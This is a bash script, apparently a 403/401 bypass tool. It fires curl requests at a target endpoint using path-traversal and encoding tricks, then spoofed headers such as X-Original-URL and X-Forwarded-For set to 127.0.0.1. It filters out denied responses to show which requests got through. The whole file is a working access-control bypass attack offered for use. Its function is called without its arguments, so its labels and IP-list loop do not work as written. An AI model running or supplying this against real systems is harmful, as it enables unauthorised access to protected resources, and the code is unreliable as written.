#!/bin/bash
echo 'URL PATH/ IPLIST(OPT)'

path=$1
end=$2
ips=$3

bypasser () {
    # normal responses
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $path/$end
    echo "  --> ${1}/${2}"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $path/$end/
    echo "  --> ${1}/${2}/"
        
    # endpoint tests
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $path/$end.json
    echo "  --> ${1}/${2}.json"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end??"
    echo "  --> ${1}/${2}??"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end&"
    echo "  --> ${1}/${2}&"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end#"
    echo "  --> ${1}/${2}#"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end%"
    echo "  --> ${1}/${2}%"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end%3f"
    echo "  --> ${1}/${2}%3f"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end%26"
    echo "  --> ${1}/${2}%26"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end%23"
    echo "  --> ${1}/${2}%23"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $path/$end%20
    echo "  --> ${1}/${2}%20"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $path/$end%09
    echo "  --> ${1}/${2}%09"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end?"
    echo "  --> ${1}/${2}?"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $path/$end.html
    echo "  --> ${1}/${2}.html"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end?param"
    echo "  --> ${1}/${2}?param"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $path/$end#
    echo "  --> ${1}/${2}#"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $path/$end/.
    echo "  --> ${1}/${2}/."
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end..;/"
    echo "  --> ${1}/${2}..;/"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end../"
    echo "  --> ${1}/${2}../"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end..%2f"
    echo "  --> ${1}/${2}..%2f"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end..;//"
    echo "  --> ${1}/${2}..;//"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end.././"
    echo "  --> ${1}/${2}.././"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end..%00/"
    echo "  --> ${1}/${2}..%00/"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end..%0d/"
    echo "  --> ${1}/${2}..%0d/"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end..%5c"
    echo "  --> ${1}/${2}..%5c"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end..%ff/"
    echo "  --> ${1}/${2}..%ff/"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end%2e%2e%2f"
    echo "  --> ${1}/${2}%2e%2e%2f"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/$end.%2e/"
    echo "  --> ${1}/${2}.%2e/"

    # directory tests
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/..;/$end"
    echo "  --> ${1}/..;/${2}"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/../$end"
    echo "  --> ${1}/../${2}"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/..%2f$end"
    echo "  --> ${1}/..%2f${2}"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/..;//$end/"
    echo "  --> ${1}/..;//${2}"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/.././$end"
    echo "  --> ${1}/.././${2}"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/..%00/$end"
    echo "  --> ${1}/..%00/${2}"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/..%0d/$end"
    echo "  --> ${1}/..%0d/${2}"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/..%5c$end"
    echo "  --> ${1}/..%5c${2}"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/..%ff/$end"
    echo "  --> ${1}/..%ff/${2}"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/%2e%2e%2f$end"
    echo "  --> ${1}/%2e%2e%2f${2}"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$path/.%2e/$end"
    echo "  --> ${1}/.%2e/${2}"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $path/%2e/$end
    echo "  --> ${1}/%2e/${2}"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $path/./$end/./
    echo "  --> ${1}/./${2}/./"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $path//$end//
    echo "  --> ${1}//${2}//"
        
    # headers test
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "Referer: $path/$end" $path/$end
    echo "  --> ${1}/${2} -H Referer: $path/$end"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Original-URL: /$end" $path/$end
    echo "  --> ${1}/${2} -H X-Original-URL: /${2}"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Custom-IP-Authorization: 127.0.0.1" $path/$end
    echo "  --> ${1}/${2} -H X-Custom-IP-Authorization: 127.0.0.1"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: 127.0.0.1" $path/$end
    echo "  --> ${1}/${2} -H X-Forwarded-For: 127.0.0.1"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: localhost" $path/$end
    echo "  --> ${1}/${2} -H X-Forwarded-For: localhost"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: 0.0.0.0" $path/$end
    echo "  --> ${1}/${2} -H X-Forwarded-For: 0.0.0.0"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: http://127.0.0.1" $path/$end
    echo "  --> ${1}/${2} -H X-Forwarded-For: http://127.0.0.1"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: 127.0.0.1:80" $path/$end
    echo "  --> ${1}/${2} -H X-Forwarded-For: 127.0.0.1:80"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Originating-IP: 127.0.0.1" $path/$end
    echo "  --> ${1}/${2} -H X-Originating-IP: 127.0.0.1"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-Host: 127.0.0.1" $path/$end
    echo "  --> ${1}/${2} -H X-Forwarded-Host: 127.0.0.1"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Client-IP: 127.0.0.1" $path/$end
    echo "  --> ${1}/${2} -H X-Client-IP: 127.0.0.1"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Remote-Addr: 127.0.0.1" $path/$end
    echo "  --> ${1}/${2} -H X-Remote-Addr: 127.0.0.1"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Rewrite-URL: /$end" $path
    echo "  --> ${1} -H X-Rewrite-URL: /${2}"

    # IP test
    if [ -z "$3" ];
    then
        echo 'No Input File. Ending.'
    else
        while read -r line
        do
        curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: "$line"" $path/$end
            echo "  --> ${1}/${2} -H X-Forwarded-For: "$line""
            curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Originating-IP: "$line"" $path/$end
            echo "  --> ${1}/${2} -H X-Originating-IP: "$line""
            curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-Host: "$line"" $path/$end
            echo "  --> ${1}/${2} -H X-Forwarded-Host: "$line""
            curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Client-IP: "$line"" $path/$end
            echo "  --> ${1}/${2} -H X-Client-IP: "$line""
            curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Remote-Addr: "$line"" $path/$end
            echo "  --> ${1}/${2} -H X-Remote-Addr: "$line""
        done < $ips
    fi
}


bypasser | grep -vE '403|401'
